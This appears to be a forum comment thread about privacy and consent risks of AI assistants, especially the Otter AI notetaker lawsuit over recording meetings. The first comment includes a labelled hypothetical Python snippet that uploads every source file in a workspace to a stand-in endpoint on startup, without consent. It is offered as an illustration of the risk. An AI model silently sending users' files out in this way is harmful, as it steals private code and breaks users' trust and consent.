Before AI, you needed to trust the recipient and the provider (Gmail, Signal, WhatsApp, Discord). You could at least make educated guesses about both when assessing the risk profile. For example: if someone leaks the code in this repo, it's likely a collaborator or GitHub itself.
Today, you invite someone to a private repo and the code gets exfiltrated the moment a collaborator running some AI tool opens their IDE.
Or you send someone an e2ee message on Signal, but their AI reads the screen or text to summarize it, and now that message is exfiltrated.
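To make the IDE scenario concrete, here's a minimal sketch (all names, endpoints, and behavior are hypothetical, not any real tool's API) of how a client-side assistant could ship file contents off-machine the moment a workspace opens:

    # Hypothetical sketch: what a client-side AI plugin could do on workspace
    # open. Illustrates why inviting a collaborator means inviting their tooling.
    import pathlib

    import requests

    INDEX_ENDPOINT = "https://ai-vendor.invalid/v1/index"  # made-up endpoint

    def index_workspace(root: str) -> None:
        """Upload every source file for "context indexing" -- i.e., exfiltration."""
        for path in pathlib.Path(root).rglob("*"):
            if path.is_file() and path.suffix in {".py", ".go", ".ts", ".md"}:
                requests.post(
                    INDEX_ENDPOINT,
                    json={"path": str(path), "content": path.read_text(errors="ignore")},
                    timeout=10,
                )

    # Runs on editor startup -- no prompt, no per-repo consent.
    index_workspace("/home/alice/private-repo")

No one else in the repo ever sees a consent dialog.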
Yes, I know it's "nothing new" and "in principle this could happen because you don't control the client". But opsec is also about what happens when well-meaning participants become accomplices in data collection. I used to trust my friends enough not to share our conversations. Now the default assumption is that text and media, even on private messaging, will be harvested.
Personally, I'm never giving the keys to the kingdom to a remote data-hungry company, no matter how reputable. I'll reconsider when local or self-hosted AI is available.
bilekas · 8m ago
> Last year, an AI researcher and engineer said Otter had recorded a Zoom meeting with investors, then shared with him a transcription of the chat including "intimate, confidential details" about a business discussed after he had left the meeting. Those portions of the conversation ended up killing a deal,
I'm sorry, but this is another example of not checking the AI's work. The excessive recording is one thing, but blindly trusting the AI's output and then using it as a company document for a client is on you.
DaiPlusPlus · 1h ago
Assuming the courts simplify Otter AI down to being a glorified call-recording and transcribing tool (because the fact it's "AI" isn't really relevant here w.r.t. privacy/one/two-party-consent rules), then doesn't the legal responsibility here lie with whichever person added Otter AI to group-calls without informing the other members?
----
EDIT: So the crux of the matter is whether having Otter AI automatically join meetings via their Slack/Zoom/etc. integrations is by itself legally wrong:
> "In fact, if the meeting host is an Otter accountholder who has integrated their relevant Google Meet, Zoom, or Microsoft Teams accounts with Otter, an Otter Notetaker may join the meeting without obtaining the affirmative consent from any meeting participant, including the host," the lawsuit alleges. "What Otter has done is use its Otter Notetaker meeting assistant to record, transcribe, and utilize the contents of conversations without the Class members' informed consent."
I'm surprised the NPR article doesn't touch on the possible liability of whoever added Otter in the first place - surely the buck stops there?
gruez · 1h ago
>doesn't the legal responsibility here lie with whichever person added Otter AI to group-calls without informing the other members
IANAL, but companies providing a product have certain responsibilities too, especially when it's intended to be used for a given purpose (i.e. recording meetings with other people on them). Most call-recording software I come across has a recording notice that can't be disabled, presumably to avoid lawsuits like this.
>EDIT: So the crux of the matter is whether having Otter AI automatically join meetings via their Slack/Zoom/etc. integrations is by itself legally wrong:
Note that the preceding paragraph also says that even when the integrations aren't used, Otter only obtains consent from the meeting host. In all-party-consent states, that's clearly not sufficient.
>because the fact it's "AI" isn't really relevant here
Again, IANAL, but "recording" laws might not apply if they're merely transcribing the audio? To take an extreme case, it's (probably) legal to hire a stenographer to sit next to you in meetings and transcribe everything on the call, even if you don't tell any other participants. Otter is a note-taking app, so they might have been in the clear if they weren't recording for AI training.
boothby · 1h ago
I had a conversation with a lawyer who had invited Otter AI to our confidential meeting. I was gobsmacked, and I quickly read Otter's privacy statement -- my impression was that they retain your data in a cloud service and use your "anonymized" (or was it "depersonalized"?) recordings as future training data. Even if they have a bona fide reason for all that, I question their ability to store the data securely and to successfully anonymize data containing unique identifiers that could be tied to future court records. I refused to continue in the presence of the bot.
And beyond security, there's the question of their ability to keep the promises made about the data in the event of a private-equity takeover, a rogue employee, etc.
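On the anonymization point, here's a toy sketch (made-up transcript and redaction patterns) of why stripping the obvious PII still leaves re-identifiable text when unique identifiers survive:

    # Naive redaction: remove names and emails, keep everything else.
    import re

    transcript = ("Jane Roe (jane@example.com) discussed settlement strategy "
                  "for case No. 3:24-cv-01234 before Judge Smith.")

    redacted = re.sub(r"[\w.+-]+@[\w-]+\.[\w.]+", "[EMAIL]", transcript)
    redacted = re.sub(r"\b(Jane Roe|Judge Smith)\b", "[NAME]", redacted)

    print(redacted)
    # [NAME] ([EMAIL]) discussed settlement strategy
    # for case No. 3:24-cv-01234 before [NAME].

The docket number alone ties the "anonymized" transcript back to public court records, which is exactly the failure mode I'm worried about.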
xnx · 1h ago
Why does Otter AI exist? Aren't those features built into videoconferencing now?
jorts · 59m ago
Most of the ones built into the video conferencing solutions aren't as good.